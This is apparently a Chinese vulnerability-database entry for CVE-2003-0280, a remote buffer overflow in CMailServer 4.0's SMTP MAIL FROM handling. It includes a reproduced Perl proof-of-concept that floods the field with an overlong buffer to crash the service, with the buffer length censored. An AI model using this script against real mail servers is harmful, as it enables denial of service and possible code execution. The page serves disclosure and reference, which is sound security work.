Youngzsoft CMailServer MAIL FROM远程缓冲区溢出漏洞-安全小百科

Youngzsoft CMailServer MAIL FROM远程缓冲区溢出漏洞

漏洞ID	1107314	漏洞类型	边界条件错误
发布时间	2003-05-10	更新时间	2005-10-20
CVE编号	CVE-2003-0280	CNNVD-ID	CNNVD-200306-102
漏洞平台	Windows	CVSS评分	10.0

|漏洞来源

https://www.exploit-db.com/exploits/22581
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200306-102

|漏洞详情

CMailServer是一款EMAIL服务程序，包含基于WEB的邮件服务系统。CMailServer的SMTP服务程序对邮件的”MAILFROM”字段缺少正确缓冲区边界检查，远程攻击者可以利用这个漏洞对服务进行缓冲区溢出攻击，可能在系统上执行任意指令。CMailServer的SMTP服务在解析EMAIL头字段时存在问题，如果攻击者构建的邮件”MAILFROM”字段超长，就会破坏内存，触发缓冲区溢出，精心构建提交数据可能在系统上执行任意指令。

|漏洞EXP

source: http://www.securityfocus.com/bid/7547/info

A buffer overflow vulnerability has been reported for CMailServer. The vulnerability exists due to insufficient bounds checking when parsing e-mail headers. Specifically, an overly long MAIL FROM e-mail header will cause CMailServer to crash and corrupt sensitive memory. 

#!/usr/bin/perl -w
##################
# ESMTP CMailServer 4.0.2003.03.27 SMTP Service DoS attack
#
# URL: http://www.infowarfare.dk/
# EMAIL: [email protected]
# USAGE: sploit.pl <target ip>
#
# Summary:
#
# The problem is a Buffer Overflow in the SMTP protocol, within the
# ESMTP CMailServer, causing the service to shutdown
# It is then where we can actually overwrite the exception handler on the
stack allowing
# A system compromise with code execution running as SYSTEM.
#
#
# Ive censored some of the source code out. =)
#
# Solution:
# None at this time
#
#

use IO::Socket;

$target = shift() || "warlab.dk";
my $port = 25;
my $Buffer = "A" x <CENSORED> ; #


my $sock = IO::Socket::INET->new (
                                    PeerAddr => $target,
                                    PeerPort => $port,
                                    Proto => 'tcp'
                                 ) || die "could not connect: $!";

my $banner = <$sock>;
if ($banner !~ /^2.*/)
{
    print STDERR "Error: invalid server response '$banner'.n";
    exit(1);
}

print $sock "HELO $targetrn";
$resp = <$sock>;

print $sock "MAIL FROM: $Buffer@$target.dkrn";
$resp = <$sock>;

print $sock "rn";
print $sock "rnrnrnrnrnrn";

close($sock);

|参考资料

来源:BUGTRAQ
名称:20030510MultipleBufferOverflowVulnerabilitiesFoundinCMailServer4.0
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105258772101349&w;=2
来源:XF
名称:cmailserver-smtp-bo(11975)
链接:http://xforce.iss.net/xforce/xfdb/11975
来源:BID
名称:7548
链接:http://www.securityfocus.com/bid/7548
来源:BID
名称:7547
链接:http://www.securityfocus.com/bid/7547
来源:VULNWATCH
名称:20030510MultipleBufferOverflowVulnerabilitiesFoundinCMailServer4.0
链接:http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0062.html

相关推荐: Computer Associates InoculateIT Symbolic Link File Overwriting Vulnerability

Computer Associates InoculateIT Symbolic Link File Overwriting Vulnerability 漏洞ID 1103182 漏洞类型 Access Validation Error 发布时间 2001-0…

文章版权归作者所有，未经允许请勿转载。

THE END